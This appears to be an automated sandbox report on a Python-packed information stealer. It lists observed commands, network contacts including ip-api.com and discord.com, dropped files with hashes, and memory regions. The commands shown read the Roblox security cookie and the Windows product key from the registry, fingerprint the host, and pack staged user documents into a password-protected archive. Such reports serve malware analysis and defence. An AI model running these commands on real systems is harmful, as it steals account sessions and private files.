C:\Windows\System32\sihclient.exe /cv sxh5qXxU/UWbc2puDp82ow.0.2

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /PID 4492

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\QWF5y.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe a -r -hp"horns123" "C:\Users\Admin\AppData\Local\Temp\QWF5y.zip" *

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI49642\python311.dll

MD5 711da56eb35a88095f2baad0e821aa24
SHA1 2755f0d62c54642e936b63974fecc48a971e02e8
SHA256 d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6
SHA512 556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

C:\Users\Admin\AppData\Local\Temp\_MEI49642\VCRUNTIME140.dll

MD5 1d4ff3cf64ab08c66ae9a4013c89a3ac
SHA1 f9ee15d0e9b0b7e04ff4c8a5de5afcffe8b2527b
SHA256 65f620bc588d95fe2ed236d1602e49f89077b434c83102549eed137c7fdc7220
SHA512 65fbd68843280e933620c470e524fba993ab4c48ede4bc0917b4ebe25da0408d02daec3f5afcd44a3ff8aba676d2eff2dda3f354029d27932ef39c9fdea51c26

memory/4164-24-0x0000000075110000-0x0000000075620000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49642\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_ctypes.pyd

MD5 c917494b6c8c29361e42072dd17ade16
SHA1 f06b04f2c2cf9d84b7d25bb9aeebc6436d2b2bdf
SHA256 bf1454154ea8b62616461660e084c13d199f0570dc14f0e02d25b053f63ce300
SHA512 b064494c6c292969a8694f006f691b9ba00181a1d11c310ddfaa94f3b908248e5098a9e322008ee081e215c1aeed5b6c4bfeab7ac84e0dd88999fc094b4f672f

memory/4164-30-0x00000000750C0000-0x00000000750DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49642\libffi-8.dll

MD5 50d1bacecfb4df4b7f4080803cb07e4a
SHA1 e4fd81cc1de13291f5a113f386e831396d6db41d
SHA256 d555fc44125cfa750721ecd47ef64b5e1ecebbe5e94e25ea47c78dd797a94c6f
SHA512 12f9a4989ce535f3907b894589c9df18832c057d58d0674340c80d28171fdd6b2c4a1f0f581083ce4167e51013b913f05b694b370dbc3bfc43a3528814168156

memory/4164-32-0x00000000750B0000-0x00000000750BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI49642\blank.aes

MD5 036f6d1f6c2f71c67bc40d973c3ee020
SHA1 cf3a0725f795c2bc2010ea592e0bcbcaecb5fbfe
SHA256 e491504397f5d7211c3f66f2dc7c15a56a18598039bf1b1377db9183c0f8f7c9
SHA512 517eb8b03cb63bac8b04fee134042b26837812a3cc5ff4ae2ff7a80d4aea9c1aa6f132c966d85cd13172c469248132cf08324d6ee7223ce5cdae9d0fb60bc9d0

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_ssl.pyd

MD5 b0b8317d4311645ef24652afc8253cbf
SHA1 c3e54221e31432cc4cf2a18e79617391be445ffb
SHA256 d1da4f2983a8621b5b9a17fa6f603a9e7c3342f130eaacb36003ca7868935719
SHA512 8812394a68bcc1aa50776e0b3cb5c4acd979621b84a29db9930f137f510e4db1106ff07083d23c37ff338f55474a65349162e2ff51b5c49ad375a94efeab057e

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_sqlite3.pyd

MD5 648d185e67616e97457ab675d4c230b5
SHA1 5db9230c200c6a6ee29aec12f68aaed9aab0c3c8
SHA256 0e9442dda8326e3006d1e367fcf8eb8eb3fb328341aaa0ab0f3c5a4345770cce
SHA512 02726e221f9e0faa68ea36dc601da57de1ebd77905055e7d8b66c6ab643e50f58b422f490c6048a373ddbb5208e94e98875b3a043e598f487ac330b962237c6a

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_socket.pyd

MD5 722d7afdd01ec565a432cce7d8bfd8ed
SHA1 e7c6bab41e0fc79a247eeb014d584b507fd37a96
SHA256 6eeeac340cabb9e8ac3aef6d63e3891ef830817894de18f42f78459b3ff9d4a6
SHA512 6480d57eec5c59510e9401edf55aa1e8b1ea816a8e4263fcaf98a4fc4f91e4126b1cafad822ca2163329c339bfa7c24ecd51302ff543fcdb7e68b9917b7e6526

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_queue.pyd

MD5 f002633067073ce11b6b7397c2a48624
SHA1 7c9242a89f75b20ef19817425b3c88c17a23ddda
SHA256 90a5855f580838f5810f1d866380fc4a6cf7b16afb57e214b3fc49b27dcb0676
SHA512 1b6301cb2df1276806dd5f8671d11f3ce91841ad3cee92633cb86d648d8285ced5a77aac064a1108451745c466c494eb16cf74d4a56dc6d6204f681238da8d16

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_lzma.pyd

MD5 6ff7a730ddd5f767aa1975d3784c35a9
SHA1 64b89b1d29d66cf794f6fc3b30ea0f467d2e05c8
SHA256 f17f1359bfa5e65b504c0d1b9e949e755b4d36bc3d9d34dfe24207371e3be92a
SHA512 335d7ec2d76967bf04b53fa17ce5d0205f6cd4f22521fab21384cabc43c968a7b26efe77f779d60380a7262f4ccc2e7877ad26ef4784061390eee517f3b83115

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_hashlib.pyd

MD5 fc7927b65769cf47c6299402acdff309
SHA1 ab31ac116af567e551e5de9c6a5d69e98726b561
SHA256 f99a9e0c3df7de17123588c9f8db37c7ac79b7868084efcc706bd73644d06c75
SHA512 80a6ed86dba65df5619d402a0465dc9e696508623dfcaf6e0ebc5a5fc2da891f9e9694abad00e281cbead015e42e7aec674fb233c9a6140c4fd1d2f3111252f2

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_decimal.pyd

MD5 35642e5645ccfa5fa3616a4f171c6ab0
SHA1 b555808ca4ba195941ad9b50fe95f9d6ce0a8d50
SHA256 f57bd98ca4c2a7a67e6104e6eab7acf7f6a0c0f09d88efcb1688d67e298b6d7c
SHA512 4eb499dd35002982b4b37fe27a870b8a53248657e01b9aeaf25d2485c9fbef474d2f2cbe1e945b1301c87db840913d9cb802ba861e10f59010ae2e5a50f044ed

C:\Users\Admin\AppData\Local\Temp\_MEI49642\_bz2.pyd

MD5 524989939f0351e080644e8c34ccfae5
SHA1 5d8974926381f844118c8b5455d0e7e133f7566c
SHA256 2fd24d9893d41508d1736972f1a4fb241c93beaa49895977e563faf8214410de
SHA512 f6800a7eb6f655e8ebd2c2c33da02252a019ab3085d1947dd50a69206fc2be912c8e11ff10119c4374996248c0ef4d92462043dce4bc08065ebbd12ba82cbaf4

C:\Users\Admin\AppData\Local\Temp\_MEI49642\unicodedata.pyd

MD5 6a414e240bd7075c730f0873c3d66cbe
SHA1 22e5f2aee0f0342114aff9d959dfc826c63a86c4
SHA256 e249ff5b219e838f6198a256b64a70025877c797e65cbffc2eda594a76e1c1ac
SHA512 e5c626388bf7f0d93bd6bf89e8f723a413311e98807e32458cff8ab0d95519402e708d73446486db60b9faa010aebfdec0ac78a9bf9551fbaa33a396510682dc

C:\Users\Admin\AppData\Local\Temp\_MEI49642\sqlite3.dll

MD5 b2a51ffbb7178ad2ccb0fab921632b6d
SHA1 3d20de641c4f07d4f5cdb55a73e9f6db3d2df4b0
SHA256 8fd5e24c37b48442f0627fbdda965fc0daab1c943b54afdb86170af9bc743054
SHA512 c5988f6db64f0a1eac7cf377f46f6311e09c334e5f765d995e1611ec224944d6db151edeb27530c1c8b6e4d917ba8d5dfd69537728f729124357979aca136f5a

C:\Users\Admin\AppData\Local\Temp\_MEI49642\select.pyd

MD5 cb4299085672ed660952b896cd01ee28
SHA1 40b352d2afd264ed7bf3606dd867a83d5cffa30c
SHA256 0ad2612b3507ddbae829fb57b6ac7502edc21dcce331cbd415f229ff0d558250
SHA512 47c0ba29aeca732c9e2276e13f87c11a14764dfd47d6f0499034cdddcbb6d1ddd29cd0d8ee87bf7429bdcac5fff187ea4306ffd1e8bc026847e7e24556489f35

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI49642\libssl-3.dll

MD5 600f861907d668d914d16a277b845d04
SHA1 f37452a1bf601a156f12f927e97a005d0763fcac
SHA256 677b0d256dc23818ee27799f92fe3795f0e75b57e707fcc3897062db673c0926
SHA512 0ffc4f578de4af6b397e76e696b58973e2928f9f4dacd02a73993945497310d6acdbefaaa0a5c75eb1f8052c1ef18189b57989db0183fe50a66b0c3d7264e17c

C:\Users\Admin\AppData\Local\Temp\_MEI49642\libcrypto-3.dll

MD5 113de1bf32512cb3c521bb6f7b5b11c0
SHA1 9387afface76e420735d2f32646b12698ccb4f18
SHA256 d7e56c6b5c73d67a7e7c5e73700f1696e944eb013f3d14ff9f983c4f93594d01
SHA512 f97f9c8952b40f686a119111585c3231d23dc33edab7f557ac6f69f82e83d0ea375b67aa036e9b339853ee388cc62cac55e23b5a9323d8492b35ca9ba3e9f8e8

memory/4164-54-0x0000000075080000-0x00000000750A7000-memory.dmp

memory/4164-56-0x0000000075060000-0x0000000075078000-memory.dmp

memory/4164-58-0x0000000075040000-0x000000007505B000-memory.dmp

memory/4164-60-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-62-0x0000000074EE0000-0x0000000074EF6000-memory.dmp

memory/4164-64-0x0000000074E90000-0x0000000074E9C000-memory.dmp

memory/4164-66-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-67-0x0000000074E60000-0x0000000074E8C000-memory.dmp

memory/4164-69-0x0000000074DB0000-0x0000000074E59000-memory.dmp

memory/4164-73-0x0000000074A20000-0x0000000074DAC000-memory.dmp

memory/4164-74-0x00000000032E0000-0x000000000366C000-memory.dmp

memory/4164-72-0x00000000750C0000-0x00000000750DE000-memory.dmp

memory/4164-77-0x00000000749B0000-0x00000000749C0000-memory.dmp

memory/4164-76-0x00000000750B0000-0x00000000750BD000-memory.dmp

memory/4164-79-0x00000000749A0000-0x00000000749AC000-memory.dmp

memory/4164-83-0x0000000074880000-0x0000000074998000-memory.dmp

memory/2696-84-0x00000000044F0000-0x0000000004526000-memory.dmp

memory/4092-109-0x0000000004E60000-0x0000000005488000-memory.dmp

memory/1400-128-0x00000000057F0000-0x0000000005812000-memory.dmp

memory/1400-129-0x0000000005FF0000-0x0000000006056000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ymcnr2tk.rql.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2396-130-0x0000000005230000-0x0000000005296000-memory.dmp

memory/4092-156-0x0000000005580000-0x00000000058D4000-memory.dmp

memory/4164-183-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-184-0x0000000074EE0000-0x0000000074EF6000-memory.dmp

memory/4164-177-0x0000000075110000-0x0000000075620000-memory.dmp

memory/4164-191-0x0000000074880000-0x0000000074998000-memory.dmp

memory/4164-186-0x0000000074E60000-0x0000000074E8C000-memory.dmp

memory/4164-178-0x00000000750C0000-0x00000000750DE000-memory.dmp

memory/4164-188-0x0000000074A20000-0x0000000074DAC000-memory.dmp

memory/4164-192-0x0000000075040000-0x000000007505B000-memory.dmp

memory/4164-187-0x0000000074DB0000-0x0000000074E59000-memory.dmp

memory/2396-193-0x00000000060A0000-0x00000000060BE000-memory.dmp

memory/4700-194-0x00000000065E0000-0x000000000662C000-memory.dmp

memory/1400-201-0x00000000078D0000-0x0000000007966000-memory.dmp

memory/1400-202-0x0000000006DA0000-0x0000000006DBA000-memory.dmp

memory/1400-203-0x0000000006DF0000-0x0000000006E12000-memory.dmp

memory/1400-204-0x0000000007F20000-0x00000000084C4000-memory.dmp

memory/2396-205-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/4092-208-0x00000000724E0000-0x000000007252C000-memory.dmp

memory/2696-219-0x00000000724E0000-0x000000007252C000-memory.dmp

memory/4700-218-0x0000000006B30000-0x0000000006B4E000-memory.dmp

memory/4700-207-0x00000000724E0000-0x000000007252C000-memory.dmp

memory/4092-206-0x00000000061D0000-0x0000000006202000-memory.dmp

memory/1400-238-0x0000000007A10000-0x0000000007AA2000-memory.dmp

memory/2696-239-0x0000000006CC0000-0x0000000006D63000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.cmdline

MD5 fdad626d96e36813218524401081cc52
SHA1 1b2b2c935cc2f156fd95af4fba6ee99634f239eb
SHA256 91043352a042ad0f61c7b699e37a88c80321dee3226984ac36d8a7ed1c39bf26
SHA512 03d91fc46b8863800166dfd202e8d0acde4add935d531a12f11e1ec0abaee2f067d399967c68d67b45fd02a11737c7cb084225b2cdacebc0b2a88ce926483c90

\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

memory/2696-248-0x0000000006E40000-0x0000000006E4A000-memory.dmp

memory/4164-249-0x0000000075110000-0x0000000075620000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uv0yazf4\CSCEA4EBACB51ED4AC78CEBE87F415E4A33.TMP

MD5 b2524129b6f8ca2398cde5a1a15a21cd
SHA1 413f84fff82a0764a52ed1b0ca519399c18ce121
SHA256 3c98318ae11050647731de61371aa1a65494614f3a2effe4425f5b44b2076234
SHA512 b3e84b841ed3795e6c2d13ab1f779e38a573788c0cef01cf375cc8bb924bd3c17d6ebecaaaa07f202482e89ea3934b9ea1458d392f41b44979d83c83a4c01a90

C:\Users\Admin\AppData\Local\Temp\RES4E4A.tmp

MD5 d55586a914733a5adff7e8523a4e4bb1
SHA1 e627c5228422b6ecbecafeb715479db466477e19
SHA256 661dde105de6e00dda8f8a6bd5c8a85d9e77581397a483a4807b810df77920e8
SHA512 c92d0f6a7d2bd646e9e560fe47b55ca1de99f050e00f9edfafca33dea3846a53dbd5a20e5b4e4795db07c4ce5d7fcfb468340515572a41dd01ce1a1513d09663

memory/2396-272-0x0000000006140000-0x0000000006148000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uv0yazf4\uv0yazf4.dll

MD5 fe89629baa906371aadb85219d441583
SHA1 6bd586da202397d72722e254a6028a0f85f57cfc
SHA256 7a4083a0aec561f5a3ebfa0981cd0589a3aae2ebfc94dbe09a606ff08651f79f
SHA512 9d1f25b11758405fcece56758d4c3fae983a8c30dd724f730f445b010d94335f8d5c75b3141ce63331d5da735ad41af571b83fe7116ac3d1091befb092b92cfc

memory/4092-274-0x0000000007110000-0x0000000007121000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3e3d7d9b689e5506c773311c8791f7e3
SHA1 c34e72c1f7c104b4cb1514a6fa0995f6a100c99a
SHA256 5345d90e8c2f8b1f59c3d96c6d0ab00b85e8e72e61391c0aefac9cf71806d9e0
SHA512 4dde6d29b05867dac3ac3cbea6d2188814992e600ae536123e0f70956ed449ef914d5debb6695b1064eb825f1c14d3c89fe05354a74f743ef4c9b91ba6f224e0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 eedc851ccfb2e8281babb78c2f244c68
SHA1 4df05baf7c1b4f14aad3244aa30e95f234504eaf
SHA256 f8bb083f4072511a1b6c0c2e571a376fb678719fc20890ec96be851d25eaa790
SHA512 643d95f22f271d585f33609fefe30fd17b5b0380613553a86d1e94d5fb602660f2d4b7196915ac5e00f1d17702bbbecf9f4274f5dbb18820745a215b91cbc7ba

memory/4092-279-0x0000000007130000-0x000000000713E000-memory.dmp

memory/4092-281-0x0000000007140000-0x0000000007154000-memory.dmp

memory/2696-298-0x0000000007100000-0x000000000711A000-memory.dmp

memory/2696-303-0x00000000070F0000-0x00000000070F8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7c485a0c2f39466a7ed41ebda2d1d1a
SHA1 567dd25a9a2247b1dec0db09c9a54687cc35e7e8
SHA256 a68d7cb107944af7a82f1492f8e1077a282d705c732dadc91d8b1355db7085f6
SHA512 e90575427b4a869cf34328ce826ce6d357ee911dd065d60777aadf69123bd5a1ac21fc9a3663ed1ed5455d9cdc455967b275afded16a93f0810d2b82643ebdc8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2271126b2f9ce0cb98bb90504eb9bfcf
SHA1 7ca06f040e2fd666401d4770adb635f3dd7ee57f
SHA256 1e8742f064cf9159123a3657d28a194d70c07e56714d6413c606e4440929ccfc
SHA512 522978c8d4be996c9ba8688a2862af86b164cf1f427a2adcee7106acbc31ebd11b755fc6ffac7fd511ea7ff21b110f007b46884952af3d3f03536b973a06b29a

memory/4164-337-0x0000000074F00000-0x0000000075037000-memory.dmp

memory/4164-332-0x00000000750C0000-0x00000000750DE000-memory.dmp

memory/4164-331-0x0000000075110000-0x0000000075620000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 800e7254c9abfb250dd707f702e512ef
SHA1 685b831d0cc247a32647eb4c34693f607f54ae61
SHA256 d76bbb42e11c3102f5ca93591a6ecf2ee5a3e65d484f6833b5efda6b9e04f29b
SHA512 a03d9c7377b73d4941b458407903fc21facf2b20fa207b8f82d79e6fa9d72d318c1424a7d455adca7659653fcfab7ef6bcd8f4e198c1ee6e0f3d3fe9d4a0c8f4

memory/3464-357-0x0000000005740000-0x0000000005A94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\BackupUnblock.ppsm

MD5 58c541b82ecc938ba319c05d4dd010bb
SHA1 f3bd44cce07c580eecce41b17dfe82ea3534d756
SHA256 7fa83cdf495c78db552b5b87da6511263af39602b889c97a668ec7fb9b4fd2cf
SHA512 dae4aa23a63fe437fc16ccfc0334783e1be0c03bb7f9b06fedd5fa8fa9b0c658ab271fd1c7b4a6983f92edee274919e44ebb654648f8cba85c6f2197f5cfdeab

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\DenyStart.jpg

MD5 154f22ba50188383c12b2abca1d9615d
SHA1 5da7b17962d87141a6e718edad694c8a7dfffa93
SHA256 4cb4dcd39cffa5ef6a025dbabcca04789cb04e518933b34fe22e98f6bcc2d519
SHA512 c4e0f87156ba7ee196402df219dbd91e5c456f4af29038a9ff3d2cec3595587bd446901a6f05132c811c47018dcfe3ffc694ba5c33ab6f963b7baa4d1120ad79

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\InitializeRestart.jpeg

MD5 a37fef1d02fa95c5c4d0c806f7b33c3b
SHA1 6d2b02f8002ee7606d6b2a92f344af99f9473cb5
SHA256 2f4d282bc47a019402c82de1cdde5eae90d6a9f92362e2a66602bd4fc525a30e
SHA512 92769f396029a58800838bf5518a586b716748504c78cb4a4773da9f6b534ad699810fd0417f98106f1fc1f88c9d0447f1d4442bc008aa026200addfe3074a11

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Desktop\SetSubmit.mp3

MD5 0551711debc00a0d845cda07938eb846
SHA1 46e98fa784e22db4595209db6f95572e76f5f209
SHA256 9dda60a5679a8d76bb11f3cb1052418c407a9126f593e4e0d568d64d110a95ea
SHA512 1120c576bf2b8b05ab406e430e0025aacf16d5bc6fd376d6f48268413a8a5a88f002649631b4e5dba5672b98dfd806befd72dd89d798870bb1450cb4cd7b84c0

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\ApproveConfirm.csv

MD5 c5162387bf99ba422cf5bf48ff9f5898
SHA1 69a9803a7fc74807661223a0e6d269bc6d7712a1
SHA256 a17fbb9a0ecec9cfb8225223520da934de71b0bb45927a0d8d025caab7457900
SHA512 0b4b96a39f87f20e973d42328e6c3ee4f8efa6212bd78528ad1fe20bc34cebad67ac38a01ff4986d06a19d7435b7cd8c05f0c64d681dcfc6c54c733c0c59364c

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\CompareResume.docx

MD5 51ed2969fa98d1140c8958f82c28ce60
SHA1 d255c46b24f2c6d54ef6b81e95d41fa7a2271dca
SHA256 ef93c7dd41b7a2fae40eace3d1f248cf7332d29dca0f062fe4ba2b31bd65f3f8
SHA512 a5264657bce99d9e6d625613c6d06018aa796f727833ebcb9d0b0ddecd75bffda3763351ddbd64783f6bd93a638b157a5da84e75e2dd7e6e148d37931724d7f8

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\ShowProtect.doc

MD5 aa1b001d83a15073bdde3b501ce34e3f
SHA1 70b7155f88a41b0aed76eb4cd8c2a843432465ca
SHA256 a1c16c28b755a3a7eba42c716013d970ce6fd5467390903676a593c616c12076
SHA512 ecf1de16905c5fde8cbcfc294c401106b68bc8199d878be183bbcab5220526a8eb90746e872ec5c607bc84a959ca4b8947482bd384007eb133b3fe7f39fb4104

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\  ‌       \Common Files\Downloads\ConvertToExit.mp3

MD5 720a22a26820e1118e63351bc028532a
SHA1 0bb583197d9a07109fb49908fc89e898e6af214d
SHA256 90481a59394ff255c8d34a2114e7f0d09e1449138e7d1a1d844206c7891714ab
SHA512 99c6110352a722022a47ece5089de700f31dfbdb03944175ce074fb41686172d5147b8eb115ffe7e02a657aebbad4222e9bb43a14707f239d0be8469665c88d8

memory/2112-384-0x0000000005A70000-0x0000000005DC4000-memory.dmp

